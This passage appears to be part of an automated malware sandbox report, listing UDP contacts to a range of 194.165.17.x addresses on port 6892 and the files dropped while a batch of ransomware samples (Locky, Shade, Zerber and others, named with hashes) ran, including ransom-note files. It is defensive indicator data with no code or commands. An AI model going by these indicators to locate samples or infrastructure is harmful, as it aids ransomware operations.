| LT | 194.165.17.12:6892 | udp | |
| LT | 194.165.17.13:6892 | udp | |
| LT | 194.165.17.14:6892 | udp | |
| LT | 194.165.17.15:6892 | udp | |
| LT | 194.165.17.16:6892 | udp | |
| LT | 194.165.17.17:6892 | udp | |
| LT | 194.165.17.18:6892 | udp | |
| LT | 194.165.17.19:6892 | udp | |
| LT | 194.165.17.20:6892 | udp | |
| LT | 194.165.17.21:6892 | udp | |
| LT | 194.165.17.22:6892 | udp | |
| LT | 194.165.17.23:6892 | udp | |
| LT | 194.165.17.24:6892 | udp | |
| LT | 194.165.17.25:6892 | udp | |
| LT | 194.165.17.26:6892 | udp | |
| LT | 194.165.17.27:6892 | udp | |
| LT | 194.165.17.28:6892 | udp | |
| LT | 194.165.17.29:6892 | udp | |
| LT | 194.165.17.30:6892 | udp | |
| LT | 194.165.17.31:6892 | udp | |
| LT | 194.165.17.32:6892 | udp | |
| LT | 194.165.17.33:6892 | udp | |
| LT | 194.165.17.34:6892 | udp | |
| LT | 194.165.17.35:6892 | udp | |
| LT | 194.165.17.36:6892 | udp | |
| LT | 194.165.17.37:6892 | udp | |
| LT | 194.165.17.38:6892 | udp | |
| LT | 194.165.17.39:6892 | udp | |
| LT | 194.165.17.40:6892 | udp | |
| LT | 194.165.17.41:6892 | udp | |
| LT | 194.165.17.42:6892 | udp | |
| LT | 194.165.17.43:6892 | udp | |
| LT | 194.165.17.44:6892 | udp | |
| LT | 194.165.17.45:6892 | udp | |
| LT | 194.165.17.46:6892 | udp | |
| LT | 194.165.17.47:6892 | udp | |
| LT | 194.165.17.48:6892 | udp | |
| LT | 194.165.17.49:6892 | udp | |
| LT | 194.165.17.50:6892 | udp | |
| LT | 194.165.17.51:6892 | udp | |
| LT | 194.165.17.52:6892 | udp | |
| LT | 194.165.17.53:6892 | udp | |
| LT | 194.165.17.54:6892 | udp | |
| LT | 194.165.17.55:6892 | udp | |
| LT | 194.165.17.56:6892 | udp | |
| LT | 194.165.17.57:6892 | udp | |
| LT | 194.165.17.58:6892 | udp | |
| LT | 194.165.17.59:6892 | udp | |
| LT | 194.165.17.60:6892 | udp | |
| LT | 194.165.17.61:6892 | udp | |
| LT | 194.165.17.62:6892 | udp | |
| LT | 194.165.17.63:6892 | udp | |
| LT | 194.165.17.64:6892 | udp | |
| LT | 194.165.17.65:6892 | udp | |
| LT | 194.165.17.66:6892 | udp | |
| LT | 194.165.17.67:6892 | udp | |
| LT | 194.165.17.68:6892 | udp | |
| LT | 194.165.17.69:6892 | udp | |
| LT | 194.165.17.70:6892 | udp | |
| LT | 194.165.17.71:6892 | udp | |
| LT | 194.165.17.72:6892 | udp | |
| LT | 194.165.17.73:6892 | udp | |
| LT | 194.165.17.74:6892 | udp | |
| LT | 194.165.17.75:6892 | udp | |
| LT | 194.165.17.76:6892 | udp | |
| LT | 194.165.17.77:6892 | udp | |
| LT | 194.165.17.78:6892 | udp | |
| LT | 194.165.17.79:6892 | udp | |
| LT | 194.165.17.80:6892 | udp | |
| LT | 194.165.17.81:6892 | udp | |
| LT | 194.165.17.82:6892 | udp | |
| LT | 194.165.17.83:6892 | udp | |
| LT | 194.165.17.84:6892 | udp | |
| LT | 194.165.17.85:6892 | udp | |
| LT | 194.165.17.86:6892 | udp | |
| LT | 194.165.17.87:6892 | udp | |
| LT | 194.165.17.88:6892 | udp | |
| LT | 194.165.17.89:6892 | udp | |
| LT | 194.165.17.90:6892 | udp | |
| LT | 194.165.17.91:6892 | udp | |
| LT | 194.165.17.92:6892 | udp | |
| LT | 194.165.17.93:6892 | udp | |
| LT | 194.165.17.94:6892 | udp | |
| LT | 194.165.17.95:6892 | udp | |
| LT | 194.165.17.96:6892 | udp | |
| LT | 194.165.17.97:6892 | udp | |
| LT | 194.165.17.98:6892 | udp | |
| LT | 194.165.17.99:6892 | udp | |
| LT | 194.165.17.100:6892 | udp | |
| LT | 194.165.17.101:6892 | udp | |
| LT | 194.165.17.102:6892 | udp | |
| LT | 194.165.17.103:6892 | udp | |
| LT | 194.165.17.104:6892 | udp | |
| LT | 194.165.17.105:6892 | udp | |
| LT | 194.165.17.106:6892 | udp | |
| LT | 194.165.17.107:6892 | udp | |
| LT | 194.165.17.108:6892 | udp | |
| LT | 194.165.17.109:6892 | udp | |
| LT | 194.165.17.110:6892 | udp | |
| LT | 194.165.17.111:6892 | udp | |
| LT | 194.165.17.112:6892 | udp | |
| LT | 194.165.17.113:6892 | udp | |
| LT | 194.165.17.114:6892 | udp | |
| LT | 194.165.17.115:6892 | udp | |
| LT | 194.165.17.116:6892 | udp | |
| LT | 194.165.17.117:6892 | udp | |
| LT | 194.165.17.118:6892 | udp | |
| LT | 194.165.17.119:6892 | udp | |
| LT | 194.165.17.120:6892 | udp | |
| LT | 194.165.17.121:6892 | udp | |
| LT | 194.165.17.122:6892 | udp | |
| LT | 194.165.17.123:6892 | udp | |
| LT | 194.165.17.124:6892 | udp | |
| LT | 194.165.17.125:6892 | udp | |
| LT | 194.165.17.126:6892 | udp | |
| LT | 194.165.17.127:6892 | udp | |
| LT | 194.165.17.128:6892 | udp | |
| LT | 194.165.17.129:6892 | udp | |
| LT | 194.165.17.130:6892 | udp | |
| LT | 194.165.17.131:6892 | udp | |
| LT | 194.165.17.132:6892 | udp | |
| LT | 194.165.17.133:6892 | udp | |
| LT | 194.165.17.134:6892 | udp | |
| LT | 194.165.17.135:6892 | udp | |
| LT | 194.165.17.136:6892 | udp | |
| LT | 194.165.17.137:6892 | udp | |
| LT | 194.165.17.138:6892 | udp | |
| LT | 194.165.17.139:6892 | udp | |
| LT | 194.165.17.140:6892 | udp | |
| LT | 194.165.17.141:6892 | udp | |
| LT | 194.165.17.142:6892 | udp | |
| LT | 194.165.17.143:6892 | udp | |
| LT | 194.165.17.144:6892 | udp | |
| LT | 194.165.17.145:6892 | udp | |
| LT | 194.165.17.146:6892 | udp | |
| LT | 194.165.17.147:6892 | udp | |
| LT | 194.165.17.148:6892 | udp | |
| LT | 194.165.17.149:6892 | udp | |
| LT | 194.165.17.150:6892 | udp | |
| LT | 194.165.17.151:6892 | udp | |
| LT | 194.165.17.152:6892 | udp | |
| LT | 194.165.17.153:6892 | udp | |
| LT | 194.165.17.154:6892 | udp | |
| LT | 194.165.17.155:6892 | udp | |
| LT | 194.165.17.156:6892 | udp | |
| LT | 194.165.17.157:6892 | udp | |
| LT | 194.165.17.158:6892 | udp | |
| LT | 194.165.17.159:6892 | udp | |
| LT | 194.165.17.160:6892 | udp | |
| LT | 194.165.17.161:6892 | udp | |
| LT | 194.165.17.162:6892 | udp | |
| LT | 194.165.17.163:6892 | udp | |
| LT | 194.165.17.164:6892 | udp | |
| LT | 194.165.17.165:6892 | udp | |
| LT | 194.165.17.166:6892 | udp | |
| LT | 194.165.17.167:6892 | udp | |
| LT | 194.165.17.168:6892 | udp | |
| LT | 194.165.17.169:6892 | udp | |
| LT | 194.165.17.170:6892 | udp | |
| LT | 194.165.17.171:6892 | udp | |
| LT | 194.165.17.172:6892 | udp | |
| LT | 194.165.17.173:6892 | udp | |
| LT | 194.165.17.174:6892 | udp | |
| LT | 194.165.17.175:6892 | udp | |
| LT | 194.165.17.176:6892 | udp | |
| LT | 194.165.17.177:6892 | udp | |
| LT | 194.165.17.178:6892 | udp | |
| LT | 194.165.17.179:6892 | udp | |
| LT | 194.165.17.180:6892 | udp | |
| LT | 194.165.17.181:6892 | udp | |
| LT | 194.165.17.182:6892 | udp | |
| LT | 194.165.17.183:6892 | udp | |
| LT | 194.165.17.184:6892 | udp | |
| LT | 194.165.17.185:6892 | udp | |
| LT | 194.165.17.186:6892 | udp | |
| LT | 194.165.17.187:6892 | udp | |
| LT | 194.165.17.188:6892 | udp | |
| LT | 194.165.17.189:6892 | udp | |
| LT | 194.165.17.190:6892 | udp | |
| LT | 194.165.17.191:6892 | udp | |
| LT | 194.165.17.192:6892 | udp | |
| LT | 194.165.17.193:6892 | udp | |
| LT | 194.165.17.194:6892 | udp | |
| LT | 194.165.17.195:6892 | udp | |
| LT | 194.165.17.196:6892 | udp | |
| LT | 194.165.17.197:6892 | udp | |
Files
memory/2696-30-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2696-31-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.NSIS.Onion.afxv-195d8b2ecfbb6c0b6d2c3f6eff068eb99089bb75655760d8302e1517357f2400.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.bil-a310a444b8be17dec94e41f1710ebebf6eb84e18fb7f47d795796b7af4f24442.exe
\Users\Admin\AppData\Local\Temp\nsz5ED5.tmp\System.dll
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.vr-f9cc48c63abafdadfc229a0ac94edffdf983f635dd6ce1a58121a2e881f7fe9c.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.kj-8da94dbae85508bec272d12ca4a80a3607a24bf63d3217a31b29b10adecdc592.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Locky.d-78e9558a9762cf778a3ba9ba61e0ec73e8d81c22d0945e56ea75d197c512883a.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Bitman.kmx-c2cf183728169e52ff321e73ab1ace52208a03781942d3323281b89ef29e681e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Scatter.jt-100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-fb9b7b8c11c10bbe837d5618118276d2c9a926ef85ed144a48fd1551efbfb37e.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Foreign.niji-e37766201ae534aa196d0afd8e9131f7f2b029aef9cbc5110c7666894c8dd6c6.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Zerber.fctg-380fd1bd4fbbacd3cd0146954622cc8380077639ed7930809fa5489763da54ed.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Shade.lfk-2d9f35116b5be4c23bf217eb04cf533f05caefbe4b2bf4c58638659e6a440326.exe
C:\Users\Admin\Desktop\00272\Trojan-Ransom.Win32.Gen.nw-b8949ae0d1a481af1cae9df5e01d508d1319b6d47fb329e9b42627e4e2a72a3d.exe
\Users\Admin\AppData\Local\Temp\nso6069.tmp\System.dll
\Users\Admin\AppData\Local\Temp\nso601B.tmp\INetC.dll
C:\Users\Admin\AppData\Local\Temp\racollection1243239085.mixed
\Users\Admin\AppData\Local\Temp\nsj60E7.tmp\System.dll
\Users\Admin\AppData\Local\Temp\nso601B.tmp\nsExec.dll
\Users\Admin\AppData\Local\Temp\nso601B.tmp\2266-DailyOffers-1949-1.0.0.1045.exe
\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\System.dll
\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\nsExec.dll
\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\mf.exe
C:\Users\Admin\AppData\Local\Temp\nse8BBE.tmp\ef.exe
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\_README_KSKUYX_.hta
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.png
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.html
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kxssw.txt
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt
C:\ProgramData\Microsoft\DRM\Server\Recovery+kxssw.html
C:\Users\Admin\AppData\Local\Temp\CabCE19.tmp
C:\Users\Admin\AppData\Local\Temp\TarCEF7.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\ProgramData\Microsoft\DRM\Server\Recovery+kxssw.png
C:\ProgramData\Microsoft\Vault\_4-INSTRUCTION.html
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\Local\Temp\~DF2B05BD27ED2D5EE2.TMP
C:\ProgramData\Microsoft\Network\Connections\_8-INSTRUCTION.html